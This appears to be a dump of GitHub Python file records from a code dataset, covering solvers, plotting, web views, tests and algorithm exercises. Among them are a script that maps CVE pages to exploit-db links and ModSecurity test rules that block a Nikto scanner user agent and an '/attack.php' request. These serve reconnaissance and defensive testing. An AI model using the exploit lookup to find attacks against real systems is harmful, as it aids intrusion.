ok.\")\n\t\t\t\telif VERBOSE:\n\t\t\t\t\tprint(\" FAILED!\")\n\n\t\t# miscellaneous stats\n\t\tif VERBOSE and solutionset.largest_nvars > 0:\n\t\t\tprint(\"Largest System Solved: \"+\n\t\t\t\tsolutionset.largest_neqns+\" equations \"+\n\t\t\t\tsolutionset.largest_nvars+\" variables \"+\n\t\t\t\tsolutionset.largest_nsols+\" solutions\")\n\n\t# Add a constraint to the master list. If the constraint is null,\n\t# nothing is done.\n\tdef addConstraint(self, c):\n\t\tif c == None:\n\t\t\treturn\n\t\tself.constraints.append(c)\n\n\t# Seperate the constraints into coupled subsets and create a new\n\t# SolutionSet object for each one.\n\tdef seperateConstraints(self):\n\t\tsets = []\n\t\tstart = 0\n\t\tfor end in range(1, len(self.constraints) + 1):\n\t\t\t# search for constraints that are coupled with ones in [start,end)\n\t\t\tfound = False\n\t\t\tfor i in range(end,len(self.constraints)):\n\t\t\t\tif found:\n\t\t\t\t\tbreak\n\t\t\t\tfor j in range(start,end):\n\t\t\t\t\tif self.constraints[i].coupledWith(self.constraints[j]):\n\t\t\t\t\t\tfound = True\n\t\t\t\t\t\tif i != end:\n\t\t\t\t\t\t\ttmp = self.constraints[i]\n\t\t\t\t\t\t\tself.constraints[i] = self.constraints[end]\n\t\t\t\t\t\t\tself.constraints[end] = tmp\n\t\t\t\t\t\tbreak\n\t\t\t# if none were found, we have a coupled set in [start,end)\n\t\t\tif not found:\n\t\t\t\tsets.append(solutionset.SolutionSet(self.constraints, start, end - start))\n\t\t\t\tstart = end\n\t\t\t\t\n\t\treturn sets\n\n\t# Repeatedly update and remove known variables from constraints and\n\t# simplify those constraints until no more work can be done.\n\tdef simplifyConstraints(self):\n\t\tdone = False\n\t\twhile True:\n\t\t\tdone = True;\n\t\t\t# update state of varilables\n\t\t\tfor i in range(len(self.constraints)):\n\t\t\t\tnewconstraints = self.constraints[i].updateAndRemoveKnownVariables(self.map)\n\t\t\t\tif newconstraints != None:\n\t\t\t\t\tdone = False\n\t\t\t\t\tfor j in range(len(newconstraints)):\n\t\t\t\t\t\tself.addConstraint(newconstraints[j])\n\n\t\t\tif not done:\n\t\t\t\tcontinue\n\n\t\t\t# check for empty or simplifiable constraints\n\t\t\ti = 0\n\t\t\twhile i < len(self.constraints):\n\t\t\t\t# check for empty, eliminate if necessary\n\t\t\t\twhile i < len(self.constraints) and self.constraints[i].isEmpty():\n\t\t\t\t\tself.constraints[i] = self.constraints[-1]\n\t\t\t\t\tself.constraints.pop()\n\n\t\t\t\t# attempt to simplify using all others\n\t\t\t\tif i < len(self.constraints):\n\t\t\t\t\tfor j in range(i+1, len(self.constraints)):\n\t\t\t\t\t\tif self.constraints[i].simplify(self.constraints[j]):\n\t\t\t\t\t\t\tdone = False\n\t\t\t\ti += 1\t\t\n\t\t\tif done:\n\t\t\t\tbreak","repo_name":"luis-gardea/Minesweeper","sub_path":"CSP/cspstrategy.py","file_name":"cspstrategy.py","file_ext":"py","file_size_in_byte":9186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"6953029211","text":"import os, sys\nimport numpy as np\n\nfrom wavefunction_analysis.utils.read_files import read_matrix, read_number\nfrom wavefunction_analysis.utils.print_matrix import print_matrix\nfrom wavefunction_analysis.plot import plt, mcolors, ticker\n\n\nif __name__ == '__main__':\n infile = sys.argv[1]\n nstates = 21\n nwidth = 6\n fig_name = infile[:17]+'_iteration_conv'\n\n iteration = read_number(infile, 'zheng icyc in davidson:', 4)[-1]\n #print('iteration:', iteration)\n e_iter = read_matrix(infile, 1, nstates, 'zheng davidson e:', nwidth=nwidth)\n residual_iter = read_matrix(infile, 1, nstates, 'zheng dx_norm:', nwidth=nwidth)\n e_iter, residual_iter = e_iter[-iteration:], residual_iter[-iteration:]\n print(e_iter.shape, residual_iter.shape)\n #print_matrix('e_iter:', e_iter)\n\n fig = plt.figure(figsize=(12, 5), dpi=300, layout='constrained')\n\n x = range(e_iter.shape[0])\n\n ax = plt.subplot(1, 2, 1)\n for n in range(nstates):\n ax.plot(x, e_iter[:,n], label=str(n+1))\n ax.set_xlabel('iteration')\n ax.set_ylabel('energy (a.u.)')\n ax.legend()\n\n ax = plt.subplot(1, 2, 2)\n for n in range(nstates):\n ax.plot(x, residual_iter[:,n], label=str(n+1))\n ax.set_xlabel('iteration')\n ax.set_ylabel('residual')\n ax.legend()\n\n\n plt.tight_layout()\n plt.savefig(fig_name+'.png')\n","repo_name":"Zheng-Pei-c/wavefunction_analysis","sub_path":"wavefunction_analysis/plot/plot_iteration.py","file_name":"plot_iteration.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13388432055","text":"#!/usr/bin/python\n#EmreOvunc\n\nfrom requests import get\n\nurlFile = open('emo.txt','r')\nlines = urlFile.readlines()\n\nfor line in lines:\n\tURL = line.strip()\n\tCVE = URL.split(\"=\")[1]\n\tres = get(url=URL)\n\tif \"exploit-db\" in str(res._content):\n\t\texploit = (\"https://www.exploit-db\" + str(res._content).split('exploit-db')[1].split('\"')[0])\n\t\tprint(CVE + \"|\" + URL + \"|\" + exploit)\n","repo_name":"EmreOvunc/MyDailyScripts","sub_path":"cve2exploit.py","file_name":"cve2exploit.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"34750975513","text":"import collections\n\n_end = '_end_'\n\n\ndef make_trie(words):\n root = dict()\n for word in words:\n current_dict = root\n for letter in word:\n current_dict = current_dict.setdefault(letter, {})\n current_dict[_end] = _end\n return root\n\n\ndef longestWord(words):\n Trie = lambda: collections.defaultdict(Trie)\n trie = Trie()\n END = True\n trie = make_trie(words)\n print(trie)\n\n # for i, word in enumerate(words):\n # reduce(dict.__getitem__, word, trie)[END] = i\n\n stack = trie.values()\n ans = \"\"\n while stack:\n cur = stack.pop()\n if END in cur:\n word = words[cur[END]]\n if len(word) > len(ans) or len(word) == len(ans) and word < ans:\n ans = word\n stack.extend([cur[letter] for letter in cur if letter != END])\n\n return ans\n\n\n# print(make_trie('foo', 'bar', 'baz', 'barz'))\nif __name__ == '__main__':\n print(longestWord(words=[\"a\", \"banana\", \"app\", \"appl\", \"ap\", \"apply\", \"apple\"]))\n","repo_name":"anki08/Leetcode-Solutions","sub_path":"easy questions/Trie.py","file_name":"Trie.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16944130548","text":"from django.urls import path\nfrom django.views.decorators.cache import cache_page\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('index', views.index, name='index'),\n path('search', cache_page(60*60*24*30)(views.search), name='search'),\n path('browse', views.browse, name='browse'),\n path('charts', views.charts, name='charts'),\n path('get_csv//', views.get_csv, name='get_csv'),\n path('about', views.about, name='about'),\n path('documentation', views.documentation, name='documentation')\n]","repo_name":"keserulab/SH2db","sub_path":"shared/sh2db/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13967591570","text":"import ara.models as m\n\nfrom ara.tests.unit.common import TestAra\nfrom ara.tests.unit import fakes\n\n\nclass TestModels(TestAra):\n \"\"\" Basic tests for database models \"\"\"\n def setUp(self):\n super(TestModels, self).setUp()\n\n self.playbook = fakes.Playbook(path='testing.yml',\n options={'option': 'test'}).model\n self.file = fakes.File(path=self.playbook.path,\n playbook=self.playbook,\n is_playbook=True).model\n content = fakes.FAKE_PLAYBOOK_CONTENT\n self.file_content = fakes.FileContent(content=content).model\n self.play = fakes.Play(name='test play',\n playbook=self.playbook).model\n self.task = fakes.Task(name='test task',\n play=self.play,\n playbook=self.playbook,\n tags=['just', 'testing']).model\n self.data = fakes.Data(playbook=self.playbook,\n key='test key',\n value='test value').model\n self.host = fakes.Host(name='localhost',\n playbook=self.playbook).model\n self.host_facts = fakes.HostFacts(host=self.host).model\n self.task_result = fakes.TaskResult(task=self.task,\n status='ok',\n host=self.host).model\n self.stats = fakes.Stats(playbook=self.playbook,\n host=self.host,\n changed=0,\n failed=0,\n skipped=0,\n unreachable=0,\n ok=0).model\n\n for obj in [self.playbook, self.file, self.file_content, self.play,\n self.task, self.data, self.host, self.host_facts,\n self.task_result, self.stats]:\n m.db.session.add(obj)\n\n m.db.session.commit()\n\n def tearDown(self):\n super(TestModels, self).tearDown()\n\n def test_playbook(self):\n playbooks = m.Playbook.query.all()\n self.assertIn(self.playbook, playbooks)\n\n def test_playbook_file(self):\n playbook = m.Playbook.query.one()\n file = (m.File.query\n .filter(m.File.playbook_id == playbook.id)\n .filter(m.File.is_playbook)).one()\n self.assertEqual(playbook.file, file)\n\n def test_play(self):\n playbook = m.Playbook.query.get(self.playbook.id)\n self.assertIn(self.play, playbook.plays)\n\n def test_task(self):\n task = m.Task.query.get(self.task.id)\n assert task in self.playbook.tasks\n assert task in self.play.tasks\n\n def test_data(self):\n data = m.Data.query.get(self.data.id)\n self.assertEqual(data.playbook_id, self.playbook.id)\n self.assertEqual(data.key, 'test key')\n self.assertEqual(data.value, 'test value')\n\n def test_duplicate_data(self):\n data = m.Data(\n playbook=self.playbook,\n key='test key',\n value='another value'\n )\n m.db.session.add(data)\n\n with self.assertRaises(Exception):\n m.db.session.commit()\n\n def test_task_result(self):\n result = m.TaskResult.query.get(self.task_result.id)\n self.assertIn(result, self.task.task_results)\n\n def test_host(self):\n host1 = m.Host.query.filter_by(name='localhost').one()\n host2 = m.Host.query.get(self.host.id)\n\n self.assertEqual(host1, self.host)\n self.assertEqual(host2, self.host)\n\n def test_host_facts(self):\n host = m.Host.query.filter_by(name='localhost').one()\n facts = m.HostFacts.query.filter_by(host_id=host.id).one()\n facts_from_host = host.facts\n\n self.assertEqual(facts.values, facts_from_host.values)\n\n def test_duplicate_host(self):\n host = m.Host(\n name='localhost',\n playbook=self.playbook,\n )\n m.db.session.add(host)\n\n with self.assertRaises(Exception):\n m.db.session.commit()\n\n def test_stats(self):\n stats = m.Stats.query.get(self.stats.id)\n self.assertEqual(stats.host, self.host)\n self.assertEqual(stats.playbook, self.playbook)\n","repo_name":"dmsimard/ara-archive","sub_path":"ara/tests/unit/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"32"} +{"seq_id":"40599258866","text":"from amity_app.classes.room import Room\n\n\nclass LivingSpace(Room):\n \"\"\"\n child class of class Room\n defines a room that is a living space\n Contains create_room() the creates a room of type\n living space\n \"\"\"\n\n\n def __init__(self, name):\n \"\"\"\n :param name: name of room\n \"\"\"\n\n self.room_name = name.upper()\n self.room_type = \"LIVINGSPACE\"\n self.room_capacity = 4\n self.allocations = []\n\n","repo_name":"bmulobi/cp1-amity-allocation","sub_path":"amity_app/classes/living_space.py","file_name":"living_space.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30102418697","text":"\"\"\"\r\n\n\nCreate a function to rotate a two-dimensional matrix of `N * N` integer\nelements `num` times, where if `num` is positive, the rotation is\n**clockwise** , and if not, **counterclockwise**.\n\n### Examples\n\n rotate_transform([\n [2, 4],\n [0, 0]\n ], 1) ➞ [\n [0, 2],\n [0, 4]\n ]\n rotate_transform([\n [2, 4],\n [0, 0]\n ], -1) ➞ [\n [4, 0],\n [2, 0]\n ]\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef rotate_transform(M, num):\n if abs(num) % 4 == 0:\n return M\n if num > 0:\n for _ in range(num % 4):\n M = [row[::-1] for row in [list(i) for i in zip(*M)]]\n return M\n return rotate_transform(M, 4-abs(num))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"YxnrZQwKyrzgcMvT4_12.py","file_name":"YxnrZQwKyrzgcMvT4_12.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41249162783","text":"#\n# 131. Palindrome Partitioning\n#\n# Q: https://leetcode.com/problems/palindrome-partitioning/\n# A: https://leetcode.com/problems/palindrome-partitioning/discuss/972094/Kt-Js-Py3-Cpp-DFS-%2B-BT\n#\n\nfrom typing import List\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n paths = []\n N = len(s)\n ok = lambda A: ''.join(A) == ''.join(reversed(A))\n def go(i = 0, path = []):\n if i == N:\n paths.append(path.copy())\n return\n cand = []\n while i < N:\n cand.append(s[i])\n if ok(cand):\n go(i + 1, path + [''.join(cand)])\n i += 1\n go()\n return paths\n","repo_name":"claytonjwong/leetcode-py","sub_path":"131_palindrome_partitioning.py","file_name":"131_palindrome_partitioning.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"15946355568","text":"\"\"\"Population based training with PPO.\"\"\"\n\nimport os\nimport random\nimport argparse\n\nfrom envs.unity_env import Unity3DEnv\n\nimport ray\nfrom ray.tune import run, sample_from, register_env\nfrom ray.tune.schedulers import PopulationBasedTraining\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--num-cpus\",\n type=int,\n default=4,\n help=\"number of cpus to use per node\")\nparser.add_argument(\n \"--redis-password\",\n type=str,\n default=None,\n help=\"redis_password\")\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n\n # --- register env ---\n policies, policy_mapping_fn = \\\n Unity3DEnv.get_policy_configs_for_game(\"Game_MultiDroneDenseContinuous_neu\")\n\n # --- extract unity game ---\n cwd = os.path.abspath(os.getcwd())\n game = \"/envs/Game_AtoB.x86_64\" # change this to your custom environment\n game = cwd + game # can try os.join() instead\n\n register_env(\n \"unity3d\",\n lambda c: Unity3DEnv(\n file_name=game,\n no_graphics=True,\n episode_horizon=500))\n\n # Postprocess the perturbed config to ensure it's still valid\n def explore(config):\n # ensure we collect enough timesteps to do sgd\n if config[\"train_batch_size\"] < config[\"sgd_minibatch_size\"] * 2:\n config[\"train_batch_size\"] = config[\"sgd_minibatch_size\"] * 2\n # ensure we run at least one sgd iter\n if config[\"num_sgd_iter\"] < 1:\n config[\"num_sgd_iter\"] = 1\n return config\n\n pbt = PopulationBasedTraining(\n time_attr=\"time_total_s\",\n metric=\"episode_reward_mean\",\n mode=\"max\",\n perturbation_interval=120,\n resample_probability=0.25,\n # Specifies the mutations of these hyperparams\n hyperparam_mutations={\n \"lambda\": lambda: random.uniform(0.9, 1.0),\n \"clip_param\": lambda: random.uniform(0.01, 0.5),\n \"lr\": [1e-3, 5e-4, 1e-4, 5e-5, 1e-5],\n \"num_sgd_iter\": lambda: random.randint(1, 30),\n \"sgd_minibatch_size\": lambda: random.randint(128, 16384),\n \"train_batch_size\": lambda: random.randint(2000, 160000),\n },\n custom_explore_fn=explore)\n\n # --- for cluster training ---\n # redis_password = args.redis_password\n # num_cpus = int(args.num_cpus)\n # ray.init(address=os.environ[\"ip_head\"], redis_password=redis_password)\n # print(\"Nodes in the Ray cluster:\")\n # print(ray.nodes())\n\n ray.init() # comment this when on cluster\n\n run(\n \"PPO\",\n name=\"pbt_AtoB\",\n config={\n \"env\": \"unity3d\",\n \"kl_coeff\": 1.0,\n \"num_workers\": 4,\n \"num_gpus\": 0,\n \"model\": {\n\n \"free_log_std\": True\n },\n \"multiagent\": {\n \"policies\": policies,\n \"policy_mapping_fn\": policy_mapping_fn},\n # These params are tuned from a fixed starting value.\n \"lambda\": 0.95,\n \"clip_param\": 0.2,\n \"lr\": 1e-4,\n # These params start off randomly drawn from a set.\n \"num_sgd_iter\": sample_from(\n lambda spec: random.choice([10, 20, 30])),\n \"sgd_minibatch_size\": sample_from(\n lambda spec: random.choice([128, 512, 2048])),\n \"train_batch_size\": sample_from(\n lambda spec: random.choice([10000, 20000, 40000]))\n },\n local_dir=os.path.join(os.path.abspath(os.getcwd()), \"results/\"),\n scheduler=pbt,\n num_samples=8,\n verbose=1,\n resume=False,\n checkpoint_freq=90)\n\n ray.shutdown()\n","repo_name":"ramziourari/droneColony","sub_path":"tuning.py","file_name":"tuning.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26019251556","text":"\"\"\"\nRedis queue views.\nCreated on 2020-02-17.\n@desc: Redis queue views.\n@app: fab_admin\n\"\"\"\nfrom flask_appbuilder.baseviews import expose, BaseView\nfrom flask_appbuilder.security.decorators import permission_name, has_access_api\nimport logging\n\nfrom app import appbuilder, autodoc\nfrom flask.json import jsonify\nfrom flask import render_template\nimport pytz\nimport datetime\nfrom fab_admin.addon.queue.queues import schedule_requests_task, schedule_test_task\nfrom requests.auth import HTTPBasicAuth\nimport rq_dashboard\nimport rq_scheduler_dashboard\nfrom rq.compat import text_type\nfrom uuid import uuid4\nfrom flask_login import current_user\nfrom flask.globals import request\n\nlog = logging.getLogger(appbuilder.get_app.config['LOG_NAME'])\n\n\nclass QueuesView(BaseView):\n \"\"\"Queues Viewmodel class\"\"\"\n\n route_base = \"/queue\"\n\n @expose('/api/atreq/', methods=['POST'])\n @has_access_api\n @permission_name('atreq')\n @autodoc.doc(endpoint='QueuesView.at_requests', groups='Tasks')\n def at_requests(self, at):\n \"\"\"\n {\n \"desc\": \"AT request tasks entrance point.
\\\n It would provide at (linux command) feature to help you reserve a request event by your parameter.
\\\n It needs a json data have (url,method,auth,header,data) properties.
\\\n The auth and header are optional property.
\\\n Parameter: at=20190502133000 it means when at that time the task would occurred.
\\\n The at parameter format should be: %Y%m%d%H%M%S\",\n \"mediaType\": \"application/json\",\n \"data\": {\n \"url\": \".....\",\n \"method\": \"post\",\n \"auth\": \"user:pass\",\n \"header\": {\"apikey\": \"****\"},\n \"data\": {\"parame1\":\"value1\",\"parame2\":\"value2\"}\n }\n }\n \"\"\"\n try:\n if len(at) != 14:\n raise Exception('Wrong datetime format, it should be %Y%m%d%H%M%S')\n at = datetime.datetime.strptime(at, \"%Y%m%d%H%M%S\")\n at = at.astimezone(pytz.utc)\n# at = pytz.timezone('America/Chicago').localize(at).astimezone(pytz.utc)\n except Exception as e:\n log.error(\"format parameter at error=%s\", e)\n return jsonify({'message': 'Wrong parameter, it should be %Y%m%d%H%M%S', 'code': 400}), 400\n try:\n data = request.get_json()\n basic_auth = data.get('auth', None)\n if basic_auth:\n basic_auth = basic_auth.split(':')\n basic_auth = HTTPBasicAuth(basic_auth[0], basic_auth[1])\n header = data.get('header', None)\n job_id = text_type(uuid4())\n schedule_requests_task.schedule(at, data['url'], data['method'], basic_auth, header, \\\n job_id=job_id, **data['data'])\n except Exception as e:\n log.error(e)\n return jsonify({'code': 400, 'message': str(e)}), 400\n\n return jsonify({'message': 'success', 'id': job_id})\n\n @expose('/api/attest/', methods=['POST'])\n @has_access_api\n @permission_name('atreq')\n def at_test(self, at):\n \"\"\"\n Test schedule_requests_task execution test Flask-rq2 post fork feature\n \"\"\"\n try:\n if len(at) != 14:\n raise Exception('Wrong datetime format, it should be %Y%m%d%H%M%S')\n at = datetime.datetime.strptime(at, \"%Y%m%d%H%M%S\")\n at = at.astimezone(pytz.utc)\n except Exception as e:\n log.error(\"format parameter at error=%s\", e)\n return jsonify({'message': 'Wrong parameter, it should be %Y%m%d%H%M%S', 'code': 400}), 400\n try:\n data = request.get_json()\n name = data.get('name', None)\n job_id = text_type(uuid4())\n schedule_test_task.schedule(at, name, job_id=job_id)\n except Exception as e:\n log.error(e)\n return jsonify({'code': 400, 'message': str(e)}), 400\n\n return jsonify({'message': 'success', 'id': job_id})\n\nappbuilder.add_view_no_menu(QueuesView)\n\n\n@rq_dashboard.blueprint.before_request\n@rq_scheduler_dashboard.blueprint.before_request\ndef check_auth():\n \"\"\"dashboard permission checking interceptor.\"\"\"\n if not current_user.is_authenticated:\n return render_template('401.html', base_template=appbuilder.base_template, appbuilder=appbuilder), 401\n for role in current_user.roles:\n if appbuilder.get_app.config['AUTH_ROLE_ADMIN'] == role.name:\n return None\n return render_template('403.html', base_template=appbuilder.base_template, appbuilder=appbuilder), 403\nappbuilder.get_app.register_blueprint(rq_dashboard.blueprint, url_prefix=\"/rq\")\nappbuilder.add_link('tasks_queue', href=\"/rq\", label=\"tasks in queue\", category=\"Queues\")\nappbuilder.get_app.register_blueprint(rq_scheduler_dashboard.blueprint, url_prefix=\"/scheduler\")\nappbuilder.add_link('schedule_queue', href=\"/scheduler\", label=\"schedule in queue\", category=\"Queues\")\n","repo_name":"cw1427/fab-admin","sub_path":"fab_admin/addon/queue/views_queues.py","file_name":"views_queues.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"3517207975","text":"from pywps import Process, LiteralInput, LiteralOutput\nfrom pywps.app.Common import Metadata\n\n\nclass Sleep(Process):\n \n SUCCESS_MESSAGE = 'done sleeping'\n \n def __init__(self):\n inputs = [LiteralInput('delay',\n 'Delay between every update',\n data_type='float')]\n outputs = [LiteralOutput('sleep_output',\n 'Sleep Output',\n data_type='string')]\n\n super(Sleep, self).__init__(\n self._handler,\n identifier='sleep',\n version='None',\n title='Sleep Process',\n abstract=\"The process will sleep for a given delay \\\n or 10 seconds if not a valid value\",\n profile='',\n metadata=[Metadata('Sleep'), Metadata('Wait'), Metadata('Delay')],\n inputs=inputs,\n outputs=outputs,\n store_supported=True,\n status_supported=True\n )\n\n def _handler(self, request, response):\n import time\n\n sleep_delay = request.inputs['delay'][0].data\n if sleep_delay:\n sleep_delay = float(sleep_delay)\n else:\n sleep_delay = 10\n\n time.sleep(sleep_delay)\n response.update_status('PyWPS Process started. Waiting...', 20)\n time.sleep(sleep_delay)\n response.update_status('PyWPS Process started. Waiting...', 40)\n time.sleep(sleep_delay)\n response.update_status('PyWPS Process started. Waiting...', 60)\n time.sleep(sleep_delay)\n response.update_status('PyWPS Process started. Waiting...', 80)\n time.sleep(sleep_delay)\n response.outputs['sleep_output'].data = self.SUCCESS_MESSAGE\n\n return response\n \n \ndef main():\n \"\"\"Example of how to debug this process, running outside a PyWPS instance.\n \"\"\"\n sleep = Sleep()\n (request, response) = sleep.build_request_response()\n literal_in = sleep.inputs[0]\n literal_in.data = 10\n request.inputs[\"delay\"].append(literal_in)\n sleep._handler(request, response)\n\n assert response.outputs[\"sleep_output\"].data == sleep.SUCCESS_MESSAGE\n print(\"All good!\") \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"geopython/pywps-flask","sub_path":"processes/sleep.py","file_name":"sleep.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"} +{"seq_id":"9942945470","text":"pattern = \"abacabacd\"\nlps = [0 for _ in range(len(pattern))]\nleft = 0\nfor right in range(1, len(pattern)):\n if pattern[left] == pattern[right]:\n\n lps[right] = left +1\n left += 1\n\n else:\n left = 0\n\n # elif left >0:\n # lps[right] = lps[left-1]\n # left = lps[left-1]\n\n\nprint(lps)\n ","repo_name":"GizawAAiT/Competitive_programming","sub_path":"CAMP_2/lps.py","file_name":"lps.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"32702728897","text":"from pathlib import Path\nfrom os import environ\nfrom typing import Dict\n\n# $HOME has already been checked to not be None in test_env().\nDEFAULT_PATHS = {\n 'XDG_CONFIG_HOME': Path.home() / '.config',\n 'XDG_DATA_HOME': Path.home() / '.local' / 'share',\n 'XDG_CACHE_HOME': Path.home() / '.cache',\n} # type: Dict[str, Path]\n\n\ndef _get_directory(variable: str) -> Path:\n \"\"\"\n returns the default configuration directory path\n \"\"\"\n if variable not in DEFAULT_PATHS:\n raise ValueError('Invalid XDG basedir variable')\n xdg = environ.get(variable)\n if xdg is not None:\n xdg_path = Path(xdg)\n if xdg_path.is_absolute():\n return xdg_path / 'poezio'\n return DEFAULT_PATHS[variable] / 'poezio'\n\n\nCONFIG_HOME = _get_directory('XDG_CONFIG_HOME')\nDATA_HOME = _get_directory('XDG_DATA_HOME')\nCACHE_HOME = _get_directory('XDG_CACHE_HOME')\n","repo_name":"mathieui/poezio","sub_path":"poezio/xdg.py","file_name":"xdg.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"32"} +{"seq_id":"8456916749","text":"import pytest\n\nimport ModSecurity\nfrom tesla.proxy import Proxy\n\n\ndef test_intervention_disruptive_connection_made(\n mocker, proxy, modsecurity_rules, transport_factory):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRule REMOTE_ADDR \"@ipMatch 127.0.0.1\" \"deny,phase:0,id:35,msg:\\'Blocked\\'\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n mocker.patch.object(proxy, '_create_target_connection')\n\n proxy.connection_made(transport_factory())\n\n proxy._create_target_connection.assert_not_called()\n\n\ndef test_intervention_disruptive_request_url(mocker, proxy, modsecurity_rules,\n transport_factory):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRule REQUEST_URI \"@streq /attack.php\" \"id:1,phase:1,t:lowercase,deny\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_target')\n\n # This is really a limitation of httptools\n # We can only add pending parsed url after adding a header\n # although we make sure to check for interventions on the uri\n # before processing parsed header\n proxy.data_received(b'GET /attack.php HTTP/1.1\\n')\n proxy.data_received(b'Connection: Close\\n\\n')\n\n assert proxy.send_to_target.call_count == 2\n proxy.send_to_target.reset_mock()\n\n proxy.on_request_headers_complete()\n\n proxy.send_to_target.assert_not_called()\n\n\ndef test_intervention_disruptive_request_header(\n mocker, proxy, modsecurity_rules, transport_factory):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRule REQUEST_HEADERS:User-Agent \"nikto\" \"log,deny,id:107,msg:\\'Nikto Scanners Identified\\'\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_target')\n\n proxy.data_received(b'GET /index.html HTTP/1.1\\n')\n proxy.data_received(b'User-Agent: nikto\\n\\n')\n\n assert proxy.send_to_target.call_count == 2\n proxy.send_to_target.reset_mock()\n\n proxy.on_request_headers_complete()\n\n proxy.send_to_target.assert_not_called()\n\n\ndef test_intervention_disruptive_request_body(mocker, proxy, modsecurity_rules,\n transport_factory,\n http_request_with_body):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRequestBodyAccess On\\n'\n rule += 'SecRule REQUEST_BODY \"@contains hello\" \"id:43,phase:2,deny\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_target')\n\n proxy.data_received(http_request_with_body)\n\n # request line + 10 headers + \\n\n # do not call body\n assert proxy.send_to_target.call_count == 12\n\n\ndef test_intervention_disruptive_response_status(\n mocker, proxy, modsecurity_rules, transport_factory):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRule RESPONSE_STATUS \"@streq 503\" \"phase:3,id:58,deny\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_client')\n\n proxy.target_data_received(b'HTTP/1.1 503 error\\n')\n # We send the data here\n assert proxy.send_to_client.call_count == 1\n proxy.send_to_client.reset_mock()\n\n # Finish response headers\n proxy.target_data_received(b'\\n')\n\n f = open('etc/templates/403.txt', mode='r')\n forbidden_template = f.read()\n f.close()\n\n proxy.send_to_client.assert_called_once_with(\n forbidden_template, overwrite=True)\n\n\ndef test_intervention_disruptive_response_header(\n mocker, proxy, modsecurity_rules, transport_factory):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecRule RESPONSE_HEADERS:X-Cache \"MISS\" \"phase:3,id:55,deny\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_client')\n mocker.spy(proxy, 'on_response_headers_complete')\n\n proxy.target_data_received(b'HTTP/1.1 200 OK\\n')\n proxy.target_data_received(b'X-Cache: MISS\\n\\n')\n proxy.on_response_headers_complete.assert_not_called()\n\n # Called two times for two headers above\n assert proxy.send_to_client.call_count == 3\n proxy.send_to_client.reset_mock()\n\n # Finish response headers\n proxy.on_response_headers_complete()\n \n f = open('etc/templates/403.txt', mode='r')\n forbidden_template = f.read()\n f.close()\n\n proxy.send_to_client.assert_called_once_with(\n forbidden_template, overwrite=True)\n\n\ndef test_intervention_disruptive_response_body(\n mocker, proxy, modsecurity_rules, transport_factory, http_response):\n rule = 'SecRuleEngine On\\n'\n rule += 'SecResponseBodyAccess On\\n'\n rule += 'SecRule RESPONSE_BODY \"Hello\" \"deny,phase:4,id:54\"'\n assert modsecurity_rules.load(rule) > 0, modsecurity_rules.getParserError()\n\n proxy.connection_made(transport_factory())\n\n mocker.patch.object(proxy, 'send_to_client')\n\n proxy.target_data_received(http_response)\n\n # 1 response status, 4 headers, \\n\n # do not call body\n assert proxy.send_to_client.call_count == 7\n\n f = open('etc/templates/403.txt', mode='r')\n forbidden_template = f.read()\n f.close()\n\n proxy.send_to_client.assert_called_with(\n forbidden_template, 